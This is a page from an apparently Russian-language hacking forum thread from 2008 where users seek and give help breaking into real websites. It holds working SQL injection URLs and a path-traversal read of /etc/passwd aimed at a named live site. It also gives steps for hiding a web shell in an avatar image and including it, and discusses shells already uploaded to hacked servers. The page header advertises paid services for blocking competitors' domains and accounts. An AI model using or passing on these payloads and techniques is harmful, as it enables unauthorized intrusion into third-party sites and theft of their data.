УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 312 из 2438

312

Опции темы

Поиск в этой теме

Опции просмотра

#3111

29.08.2008, 16:02

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Цитата:

Сообщение от geforse

Помогите плизз:

Код:

http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*

С SQL-Inj мало работал(

1. Вот:

Код:

http://www.freedancer.ru/?module=messages&page=comments&messageid=2095'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat(version(),char(58),user()))),11,12--+

2. Постить в тему с SQL инъекциями, то что ты запостил - не следовало, это не SQL инъекция - это издевательство, да и тема та не для вопросов (ну за это ты уже словил минус).

3. Прочитай хотя бы одну статью про SQL инъекции и не смеши людей.

#3112

29.08.2008, 16:22

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

Цитата:

Сообщение от softrix

Хм, а как через мускул, можно пароль к фтп узнать ?

не через мускул, а через шелл который ты уже залил, читаешь файлы пхп смотришь конфиги для мускула. может быть тебе повезёт и пароль подойдёт к фтп.

#3113

29.08.2008, 16:39

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Цитата:

Сообщение от geforse

Помогите плизз:

Код:

http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*

С SQL-Inj мало работал(

Немного покопался я....

PHP код:


		
			
http://www.freedancer.ru/?module=messages&page=comments&messageid=-2095'+union+select+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),11,12+from+cms_site_comments/*

если пойти дальше, можно найти читалку файлов...

PHP код:


		
			
http://www.freedancer.ru/?module=../../../../../../../../etc/passwd%00&cmd=list&dt=2

как видно magic_quotes_gpc = Off, что очень радует!

Далее регаемся, заливаем картинку с телом шелла в автару, путь будет примерно такой:

Цитата:

/home/www/stussy/freedancer/cache/avatars/image.jpg

С помощью читалки ищем дырку в каком нить скрипте, где будет возможен инклуд и инклудим сам шелл....

вот и все =)

#3114

29.08.2008, 18:55

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

такая фигня. взломал сайт, залил туда шелл (мадшелл с99). а он не показывает некоторые файлы =/

выполнял комманду ls -la - показывает все файлы (r57 показывает все)

с чем это может быть связано?

#3115

30.08.2008, 14:27

tor4)

Познающий

Регистрация: 27.05.2008

Сообщений: 51

Провел на форуме:
611529

Репутация: 41

jon21
Линк в студию))) gg

#3116

30.08.2008, 19:49

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

Недавно при проведении скуль-инъекции возникла такая проблема - например, когда делаешь следующий запрос
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users/*
Скрипт выдает рандомное имя юзера из таблы, но стоит начать использовать лимит -
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+0,1/* или
www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+1,1/*
То облом - скрипт ничего не выдает

И так со всеми таблицами, что можно в таком случае сделать ?

#3117

30.08.2008, 19:58

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

0nep@t0p
limit+1+offset+1
Видел как то фильтрацию "," точнее не фильтрацию, конечно , но неадекватную реакцию на неё именно в лимите

Если нет, кинь линк в ПМ посмотрим

#3118

30.08.2008, 20:07

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм

#3119

30.08.2008, 22:23

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

Почему load_file() иногда доказывает содержимое дерикторий а иногда нет т.е. файлы читает а содержимое дерикторий не показывает, например load_file('/home/') дира есть а он содержимое не кажит

и как узнать какие диры на сервере есть чтоб знать где чего прочитать можно

ответ нашел всем спасибо)

Последний раз редактировалось truelamer; 30.08.2008 в 22:47..

#3120

31.08.2008, 00:56

Nek1t

Участник форума

Регистрация: 07.03.2008

Сообщений: 141

Провел на форуме:
405538

Репутация: 23

Цитата:

ответ нашел

Поделись ответом, раз нашел

Страница 312 из 2438

312

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход